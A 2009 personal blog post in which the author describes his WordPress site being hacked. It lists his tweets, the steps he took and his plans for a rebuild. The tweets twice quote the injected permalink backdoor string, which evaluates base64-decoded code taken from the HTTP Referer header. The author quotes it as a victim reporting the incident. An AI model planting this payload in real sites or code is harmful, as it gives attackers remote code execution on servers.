Update on WP hack

by Justin Souter on September 6, 2009


For those of you who follow me via my @souterconsults account, you will have seen me have a paddy on this Friday last. That’s because my WP instance got hacked. Meh :$

So, I thought it would be useful to update anyone interested with a quick run-down, as it sets the scene for any future developments (like a complete re-build: bah).

I’m setting out here:

  • List of tweets, which pretty much explain what happened
  • Brief notes of more detail
  • Other links, if they’re not in the first two sections
  • Actions. Bah


  1. argh, wanting to publish my Cloud vids from YouTube, but WP is putting %&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/ on URL 3:15 PM Sep 4th from twhirl
  2. http://twurl.nl/06n2fh explains – I’m trying to find the malicious code asap :'( 3:42 PM Sep 4th from twhirl
  3. ok, I’ve switched off the navigation on the site & parked links to comments, archive, & recent posts to help avoid people getting borked 4:02 PM Sep 4th from twhirl
  4. Site back in action: WP Permalink config restored –http://twurl.nl/ddfchd fyi ‘Hardening WordPress’ http://twurl.nl/ih81jk 5:09 PM Sep 4th from twhirl
  5. just blogged: Cloud Computing – YouTube videos http://twurl.nl/g38ukl 5:23 PM Sep 4th from twitterfeed
  6. Links for WP hack %&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/ again – http://twurl.nl/5qclh3 & http://twurl.nl/d55o4c 5:39 PM Sep 4th from twhirl


  1. Was posting about YouTube videos on Cloud Computing
  2. Copying and pasting the URL into Twhirl to send out on Twitter
  3. Noticed there was a whole string of characters after the ‘proper’ URL
  4. Deleted post
  5. Republished
  6. It was still there
  7. Copied the string and Googled it
  8. Found “[resolved] NASTY CODE hacks onto your domain. FIX included.” #2 in ‘Tweets’
  9. Went on from there & blogged original post…

Looking at my install:

  • The plugin options table seems to have disappeared [although this may not be a bad thing – I should check the WP changelog…]
  • WP pages seem clean at the mo’

Various links

Worthwhile checking out


  • Need to do several more, more detailed trawls through my WP install
  • Probably need to do a rebuild (from scratch, preferably). Meh
  • Enabled various plugins, e.g. Login LockedDown, but Maintenance Mode didn’t work :-(

A shot across the bows, hopefully not much more (fingers tightly crossed).

[UPDATE: fyi I believe I was on WP v2.8.0 when I was hacked. Latest version at the time of writing is 2.8.4.

Technorati Tags: ,,,,,,chastened

Previous post:

Next post: